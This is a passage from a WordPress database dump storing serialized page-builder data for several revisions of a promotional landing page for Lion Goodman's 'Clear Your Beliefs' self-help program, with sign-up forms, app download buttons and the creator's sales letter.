value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form style="position: relative; bottom: -2px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1450:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong><u>Clear Your Limiting</u>\nand Negative Beliefs</strong></big> <big><strong>\n- Permanently!</strong></big>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">A 7-week journey into your<br>subconscious mind to delete the beliefs that hold you back.</p>\n\n<form class="infusion-form rd-form-1 3rd-rd-form-1" style="position: relative; bottom: -23px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit�&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2893:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em style="margin-left: -6px;">What do I want to experience?</em></li>\n	<li><em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em></li>\n	<li><em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:525:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p>\n\n<hr id="lines"/>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1408, 1847, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1466:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input required id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input required id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2142:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form style="position: relative; top: 10px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form style="position: relative; bottom: -2px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1447:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 10px; font-size: 16px;"><big><strong><u>Clear Your Limiting</u>\nand Negative Beliefs</strong></big> <big><strong>\n- Permanently!</strong></big>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">A 7-week journey into your\nsubconscious mind to delete the beliefs that hold you back.</p>\n\n<form class="infusion-form rd-form-1 3rd-rd-form-1" style="position: relative; bottom: -23px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit�&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2893:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em style="margin-left: -6px;">What do I want to experience?</em></li>\n	<li><em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em></li>\n	<li><em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:525:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p>\n\n<hr id="lines"/>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1409, 1848, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1466:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input required id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input required id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2142:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form style="position: relative; top: 10px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form style="position: relative; bottom: -2px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1443:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 10px; font-size: 16px;"><big><strong><u>Clear Your Limiting</u>\nand Negative Beliefs</strong></big> <big><strong>\n- Permanently!</strong></big>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">A 7-week journey into your\nsubconscious mind to delete the beliefs that hold you back.\n\n<form class="infusion-form rd-form-1 3rd-rd-form-1" style="position: relative; bottom: 15px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit�&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2893:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 